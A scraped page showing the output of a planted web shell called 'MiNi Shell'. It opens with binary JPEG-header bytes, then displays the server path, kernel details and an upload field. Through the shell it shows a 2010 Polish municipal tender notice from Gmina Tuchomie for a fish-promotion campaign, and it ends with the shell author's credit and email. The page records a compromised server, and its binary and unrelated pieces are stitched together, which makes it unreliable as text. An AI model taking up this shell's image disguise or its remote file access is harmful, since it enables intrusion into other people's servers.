JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/281545-N-2010.html

<p class="kh_header"><b>Tuchomie: Organizacja kampanii promocyjnej Pokochaj ryby-ryba sposobem na dobre samopoczucie i zdrowe życie.</b><br>
<b>Numer ogłoszenia: 281545 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchomie , ul. Jana III Sobieskiego 16, 77-133 Tuchomie, woj. pomorskie, tel. 059 8215040, faks 059 8215056.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.tuchomie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kampanii promocyjnej Pokochaj ryby-ryba sposobem na dobre samopoczucie i zdrowe życie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Organizacja kampanii promocyjnej Pokochaj ryby-ryba sposobem na dobre samopoczucie i zdrowe życie.
Miejsce realizacji:
- Tuchomie, ul. Ks. Jana Hinza 1, 77-133 Tuchomie, gmina Tuchomie, powiat bytowski, województwo pomorskie (degustacja i promocja)
- Kramarzyny, ul. Pomorska 56, 77-135 Kramarzyny, gmina Tuchomie, powiat bytowski, województwo pomorskie (promocja)

Przedmiot zamówienia obejmuje:
2.1. Zakup nagród do konkursów, na co składa się: 
- miejsce I -Encyklopedia potraw z ryb - szt. 12
- miejsce II - Atlas ryb - szt. 12
- miejsce III - koszulka z logo akcji - szt. 12
- gadżety promocyjne dla pozostałych - smycze z logo programu - szt. 442

2.2. Publikacja i wykonanie materiałów i gadżetów promocyjnych (ulotki oraz plakaty informacyjne), na co składa się: 
- Wykonanie ulotek informacyjnych z logo programu Zrównoważony Rozwój Sektora Rybołówstwa i Nadbrzeżnych Obszarów Rybackich 2007-2013 - Ulotka zawierać będzie informacje na temat walorów zdrowotnych i smakowych spożywania ryb oraz składników odżywczych ryb. Wydanie oprócz powyższych informacji zawierać będzie również przepisy kulinarne na potrawy i dania rybne - format A4 (składany na trzy) -  szt. 1000
- Wykonanie plakatów informacyjnych o programie - Plakat zawierać będzie informacje na temat organizowanej przez nas kampanii promującej spożywanie ryb i potraw rybnych, tj.  nazwę kampanii, krótki opis przebiegu całej kampanii, cele kampanii, źródło finansowania kampanii wraz z logo programu Zrównoważony Rozwój Sektora Rybołówstwa i Nadbrzeżnych Obszarów Rybackich 2007-2013 - format A4 - szt.25, format A2 - szt. 20.

2.3. Publikacja i wykonanie materiałów i gadżetów promocyjnych (kolorowanki, długopisy, i smycze), na co składa się:
- wykonanie kolorowanek o tematyce ryb - kolorowanka dla dzieci zawierać będzie rysunki różnych gatunków ryb, potraw, które można z nich przyrządzić oraz opisy dań i inne ciekawostki na ich temat - format A5, liczba stron 12, szt. 700
- wykonanie smyczy z logo programu - na smyczach umieszczone zostanie logo programu Zrównoważony Rozwój Sektora Rybołówstwa i Nadbrzeżnych Obszarów Rybackich 2007-2013 oraz nazwa kampanii promocyjnej - szt. 600
- wykonanie długopisów z logo programu - na długopisach umieszczone zostanie logo programu Zrównoważony Rozwój Sektora Rybołówstwa i Nadbrzeżnych Obszarów Rybackich 2007-2013 oraz nazwa kampanii promocyjnej - szt. 1000

2.4. Zabezpieczenia logistyczne imprezy plenerowej (ubezpieczenie, wynajem zaplecza sanitarnego, wynajem 10 osób do ochrony i opieki przedmedycznej), na co składa się:
- wynajęcie 10 strażaków do ochrony
- wynajęcie 5 szt. kabin sanitarnych
- ubezpieczenie imprezy

2.5. Degustacja różnorodnych potraw dla ok. 4000 osób, w tym: 
- dostarczenie, przyrządzenie i podanie pięciu rodzajów potraw i dań rybnych:
a) Mieszek chłopski z flądry (1 porcja - 200 g) - 800 porcji 
b) Łosoś z grilla z limonką (1 porcja - 150 g) - 800 porcji 
c) Mintaj w sosie greckim (1 porcja - 200 g) - 800 porcji   
d) Pstrąg z grilla w folii z pietruszką (1 porcja - 150 g) - 800 porcji
e) Barszcz z krokietem z farszem z morszczuka (1 porcja - 250 ml) 
- obsługa kelnerska, wydawanie potraw - 30 osób x 10 godz.
- zakup jednorazowych naczyń:
a) miseczki 250 ml - szt. 3000
b) talerzyki - szt. 3000
c) łyżki - szt. 3000
d) widelce - szt. 3000
e) noże - szt. 3000

2.6. Produkcja materiałów reklamowych promujących kampanię (2 banery, ulotki A6, zaproszenia, wysyłka zaproszeń, koszulki bawełniane) na co składa się:
- projekt, wykonanie 2 banerów reklamowych z PCV zwijanych w rulon o wymiarach 6x1 m i zawieszenie ich w widocznym miejscu na terenie miejscowości Tuchomie oraz demontaż po zakończeniu - banery reklamowe zawierać będą informacje o terminie i miejscu odbycia się imprezy plenerowej pn. W plener z rybką w ramach realizowanej kampanii promującej ryby i produkty rybne, cele imprezy promującej, nazwę programu oraz źródło finansowania kampanii.
- Projekt, wykonanie i wydruk ulotek A6 w kolorze, papier kredowy - szt. 1000 - ulotki zawierać będą informacje o terminie i miejscu odbycia się imprezy plenerowej pn. W plener z rybką w ramach realizowanej kampanii promocyjnej promującej ryby i produkty rybne, cele imprezy promującej, nazwę programu oraz źródło finansowania kampanii. Ulotki rozdawane będą w miejscach publicznych, np. w Urzędzie Gminy, na salach wiejskich, w szkołach, tablicach ogłoszeniowych, itp.
- przygotowanie, wydruk oraz wysyłka zaproszeń w kolorze z logo programu, papier kredowy, format 297x100 - szt. 200
- przygotowanie oraz dostarczenie koszulek bawełnianych różnokolorowych z nadrukiem (logo programu, nazwa operacji, itp.) - szt. 200

2.7. Promocja kampanii w lokalnych mediach (emisja reklamy w lokalnym radio, emisja reklamy w lokalnej prasie), na co składa się:
- emisja reklamy w lokalnej prasie - format A4 - reklama całostronicowa kolorowa - x 1 
W ramach kampanii promocyjnej, w lokalnej prasie umieszczona zostanie reklama imprezy promocyjnej pn. W plener z rybką, która zawierać będzie informacje o terminie i miejscu odbycia się imprezy plenerowej w ramach realizowanej kampanii promującej spożywanie ryb, programie imprezy promocyjnej, celach organizacji imprezy, nazwie programu oraz źródłach finansowania.
- emisja reklamy w lokalnym radiu - emisja 5 spotów 30 sekundowych w godz. 8:00-16:00
Spoty zawierać będą informacje o imprezie promocyjnej w plenerze W plener z rybką, termin i miejsce odbycia się imprezy plenerowej w ramach realizowanej kampanii promującej spożywanie ryb, celach organizacji imprezy, nazwie programu oraz źródłach finansowania. Planowana jest emisja jednego spotu dziennie przez pięć dni poprzedzających datę imprezy plenerowej.

3.	Projekt ma być dofinansowany w ramach działania 3.4. Rozwój nowych rynków i kampanie promocyjne Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013, objętego osią priorytetową 3-środki służące wspólnemu interesowi.

4.	Kody Wspólnego Słownika Zamówień:
   79 95 20 00-2 

5.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych

6.	Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej

7.	Zamawiający nie dopuszcza możliwość udzielenia zamówień uzupełniających.

8.	Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom:
Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.

9.	Wymagania stawiane Wykonawcy:
9.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
9.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
9.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
9.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
9.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 

10.	Inne wymagania:
10.1.	Wykonawca zapewni wszystkie niezbędne dokumenty, procedury oraz technologię i obsługę do przygotowania i dystrybucji potraw. Po stronie wykonawcy jest również zapewnienie wszelkich dodatkowych urządzeń niezbędnych do przygotowania, przechowywania i dystrybucji zamówionych potraw do degustacji.
10.2.	Wszystkie przygotowane i wydawane przez Wykonawcę dania muszą być świeże, przygotowane z produktów dobrej jakości, zdatne do spożycia i przygotowane z zachowaniem zasad higieniczno-sanitarnych.
10.3.	Wykonawca Ponosi odpowiedzialność wobec Zamawiającego i osób trzecich za wszelkie szkody wynikłe z powodu niewłaściwej jakości potraw do degustacji (np. zatrucia pokarmowe itp.)
10.4.	Potrawy dostarczone przez Wykonawcę (w asortymencie i ilości jak określono w pkt 2.5 niniejszej SIWZ) są własnością Zamawiającego. W przypadku nie rozdysponowania całego asortymentu w trakcie kampanii Wykonawca protokolarnie przy udziale Zamawiającego przekaże pozostałości do utylizacji
10.5.	Wykonawca uporządkuje teren najpóźniej do dnia 12 listopada do godz. 14:00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 11.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy (załącznik do SIWZ nr 1) - wypełniony i podpisany przez wykonawcę
A.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych (załącznik do SIWZ nr 2).
A.3) Wzór umowy (Załącznik do SIWZ nr 4) - zaakceptowany przez Wykonawcę (podpisany przez Wykonawcę)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.tuchomie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Tuchomie
ul. Jana III Sobieskiego 16
77-133 Tuchomie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 13:00, miejsce: Gmina Tuchomie
ul. Jana III Sobieskiego 16
77-133 Tuchomie
pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt ma być dofinansowany w ramach działania 3.4. Rozwój nowych rynków i kampanie promocyjne Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013, objętego osią priorytetową 3-środki służące wspólnemu interesowi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com